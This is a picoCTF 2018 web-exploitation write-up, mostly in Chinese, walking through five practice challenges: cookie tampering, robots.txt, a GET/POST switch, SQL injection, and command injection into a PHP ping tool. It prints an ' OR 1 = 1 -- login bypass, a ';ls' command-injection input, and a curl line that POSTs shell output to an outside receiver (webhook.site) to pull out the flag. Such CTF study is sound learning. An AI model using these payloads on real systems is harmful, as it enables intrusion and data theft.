picoCTF 2018 Web Exploitation writeup === ###### tags: `picoCTF 2018` `Web Exploitation` # Logon - Points: 150 Hints: * Hmm it doesn't seem to check anyone's password, except for admins? * How does check the admin's password? ## 思路: 這題想了很久,一開始還想 SQL injection 炸下去,但失敗了QQ 後來靈光一閃想到可能是 Cookie 驗證身份,Cookie 可以很輕易的更改。 利用 [EditThisCookie](https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg) 1.先隨便登入看看 ![](https://i.imgur.com/JSNDRSb.jpg) 2.登入後畫面 ![](https://i.imgur.com/PP2ZTEL.jpg) 3.來看看 Cookie ![](https://i.imgur.com/rwlr39i.jpg) 4.admin 這個值很可疑,改成 True 試試看 (T一定要大寫哦!!) ![](https://i.imgur.com/N5bhQjI.jpg) 5.重新整理一下,就 Flag captured 囉 ![](https://i.imgur.com/u4P8ZsN.jpg) # Mr. Robots - Points: 200 ## 思路: Hints:What part of the website could tell you where the creator doesn't want you to look? 1. 會想到 robots.txt 2. 連到 [http://2018shell3.picoctf.com:29568/robots.txt](http://2018shell3.picoctf.com:29568/robots.txt) 3. ``` User-agent: * Disallow: /74efc.html ``` 4. 連到 [http://2018shell3.picoctf.com:29568/74efc.html](http://2018shell3.picoctf.com:29568/74efc.html) 5. Flag captured # Buttons - Points: 250 :poop: ## 思路 1. 兩個 Button 的差別只在 post 和 get 2. 改用 post 去 request `http://2018shell3.picoctf.com:21579/button2.php` 3. Flag captured # The Vault - Points: 250 ## 思路 1. 在 [souce code](http://2018shell3.picoctf.com:49030/login.txt) 中: ```php=20 //validation check $pattern = "/.*['\"].*OR.*/i"; $user_match = preg_match($pattern, $username); $password_match = preg_match($pattern, $username); ``` $password 並沒有被過濾,因此可以利用 $password 做 SQL injection 2. SQL injection: ``` Username: 1234 Password: ' OR 1 = 1 -- ``` 3. Flag captured. # fancy-alive-monitoring - Points: 400 ## 思路 1. Hint: > This application uses the validation check both on the client side and on the server side, but the server check seems to be inappropriate. 說明前端有驗證 IP 格式,但後端驗證不嚴謹 2. 看了下 source code 發現是正規表示式(Regex),看來是 Regex 寫爛掉。 3. 把 Regex 丟去 https://www.freeformatter.com/regex-tester.html 檢查一下 ```regex ^(([1-9]?[0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]).){3}([1-9]?[0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]) ``` ![](https://i.imgur.com/x3DYA1G.jpg) 發現最後面似乎是什麼都沒差? 那試試看 127.0.0.ls ![](https://i.imgur.com/djuJ1GC.jpg) Nice 4. Source Code 有 ```php exec('ping -c 1 '.$ip, $cmd_result); ``` 感覺可以試試看注入, Google: php exec injection 找到 https://hk.saowen.com/a/ac2a030e04a2c32145fcd4b2bea61d7a28963fc8a4d200b8a21c787be57d5e71 發現 `;` 在 linux 中用來分離 commands 5. 大致上講完核心的部份,接下來實際操作下 前端: Console 下指令把原本 check 函式覆蓋掉 ``` function check(){document.getElementById("monitor").submit();} ``` 後端: Input:127.0.0.1;ls ![](https://i.imgur.com/XM6iR5C.jpg) 發現可以 work ,不妙的是 Source Code 看來不會把 ls 的內容噴給我看,得想辦法把 ls 內容傳出來 6. 我用 curl 來傳遞訊息,依據 https://unix.stackexchange.com/questions/326863/how-to-post-shell-output-as-json-data-with-curl ```curl curl -H "Content-Type: application/json" -X POST -d "{\"ls\": \"$(ls)\"}" "http://sitename.com/update.php" ``` 但還需要一個 server 來接收 POST 訊息,但我懶得寫一個後端出來接收,我 Google:receive http request 找到 https://webhook.site 所以丟兩次 Input ,第一次看 ls 有什麼,發現有 flag.txt ,第二次時就去 `cat flag.txt` 結果大概像這樣: https://webhook.site/#/391626f7-96de-47f5-a8f4-d1c26452d5be/4b53cb28-c885-4e37-9cd4-65fc92671abb/1 7. flag captured